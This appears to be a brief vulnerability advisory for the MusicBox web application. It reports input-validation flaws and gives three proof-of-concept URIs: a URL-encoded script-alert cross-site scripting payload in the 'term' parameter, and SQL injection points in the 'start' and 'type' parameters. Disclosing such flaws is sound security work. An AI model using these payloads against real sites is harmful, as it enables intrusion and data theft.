• info
• discussion
• exploit
• solution
• references

MusicBox Multiple Input Validation Vulnerabilities

Attackers can exploit these issues via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/index.php?in=song&term=%22%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&action=search&start=0
http://www.example.com/index.php?in=song&term=r0t&action=search&start=[SQL]
http://www.example.com/index.php?action=top&show=10&type=[SQL]